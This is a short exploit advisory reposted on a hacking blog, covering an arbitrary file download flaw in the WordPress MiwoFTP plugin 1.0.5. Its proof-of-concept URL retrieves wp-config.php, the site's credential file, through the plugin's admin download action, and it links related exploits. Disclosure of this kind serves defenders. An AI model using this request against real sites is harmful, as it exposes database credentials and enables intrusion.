Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86371814

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title     :WordPress MiwoFTP Plugin 1.0.5 Arbitrary File Download Exploit
# Vendor			:Miwisoft LLC
# Vendor Homepage   :http://www.miwisoft.com
# Version  			:1.0.5
# Tested on         :Win7/Chrome/Firefox
# Exploit Author    :Necmettin COSKUN =>@babayarisi
# Discovery date    :04/15/2015
  

MiwoFTP is a file manager plugin for Wordpress.

  
Description
================
Wordpress MiwoFTP Plugin 1.0.5 suffers from arbitrary file download vulnerability.

Poc Exploit
================
 http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes
  
================
#RCE/XSS/CSRF by Gjoko 'LiquidWorm' Krstic

#http://www.exploit-db.com/exploits/36763/
#http://www.exploit-db.com/exploits/36762/
#http://www.exploit-db.com/exploits/36761/
================

Discovered by:
================
Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!